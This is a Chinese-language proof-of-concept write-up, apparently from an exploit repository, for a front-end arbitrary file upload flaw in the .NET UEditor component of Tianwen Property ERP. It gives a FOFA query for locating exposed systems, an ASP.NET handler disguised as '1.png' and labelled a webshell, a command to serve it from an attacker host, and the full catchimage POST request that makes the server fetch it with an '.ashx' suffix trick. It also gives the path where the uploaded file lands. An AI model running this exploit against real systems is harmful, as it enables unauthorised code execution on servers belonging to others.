POC00/天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞.md
2025-04-02 22:36:18 +08:00

77 lines
2.7 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 天问物业ERP系统UEditor编辑器存在前台任意文件上传漏洞
# 一、漏洞简介
天问物业ERP系统使用了UEditor编辑器Ueditor是百度开发的一个网站编辑器目前已经不对其进行后续开发和更新该漏洞只存在于该编辑器的.net版本。其他的php,jsp,asp版本不受此UEditor的漏洞的影响.net存在任意文件上传绕过文件格式的限制在获取远程资源的时候并没有对远程文件的格式进行严格的过滤与判断。
# 二、影响版本
+ 天问物业ERP系统
# 三、资产测绘
+ fofa`body="国家版权局软著登字第1205328号"`
+ 登录页面
![1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25.png](./img/K_9Hxjp7rVHtd8qW/1693186922915-1f51f82b-7763-45ed-a0a0-77d42bbe6c25-559103.png)
# 四、漏洞复现
1. 新建文件内容为webshell文件命令为`1.png`
```plain
<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("hello");
}
}
```
![1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434.png](./img/K_9Hxjp7rVHtd8qW/1699459699279-92ff0e65-bd41-4ccd-ab54-94d03f956434-141843.png)
2.`1.png`传到vpn上使用python起个http服务
```plain
python3 -m http.server 50000
```
![1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905.png](./img/K_9Hxjp7rVHtd8qW/1699459777311-e5d1732e-d61d-48a9-899e-b7a851536905-810103.png)
4. 替换`source[]`为webshell文件地址通过exp上传文件
```plain
POST /HM/M_main/Jscript-Ui/UEditor/net/controller.ashx?action=catchimage HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: null
Connection: close
Cookie: ASP.NET_SessionId=mzare1hg1ewzaxhakacjhfo0
Upgrade-Insecure-Requests: 1
source[]=http://xx.xx.xx.xx:50000/1.png?.ashx
```
![1699459840110-a48401c5-7f95-44c7-b8d7-c03b791f76f2.png](./img/K_9Hxjp7rVHtd8qW/1699459840110-a48401c5-7f95-44c7-b8d7-c03b791f76f2-870382.png)
5. 上传文件位置
```plain
/HM/M_main/Jscript-Ui/UEditor/net/upload/image/20231109/6383508541150163493063174.ashx
```
![1699459950239-dc62eae6-3df6-4fdb-b1eb-4da0f525b4dd.png](./img/K_9Hxjp7rVHtd8qW/1699459950239-dc62eae6-3df6-4fdb-b1eb-4da0f525b4dd-177142.png)
> 更新: 2024-03-03 20:04:36
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ytzd6rysuc9t66vs>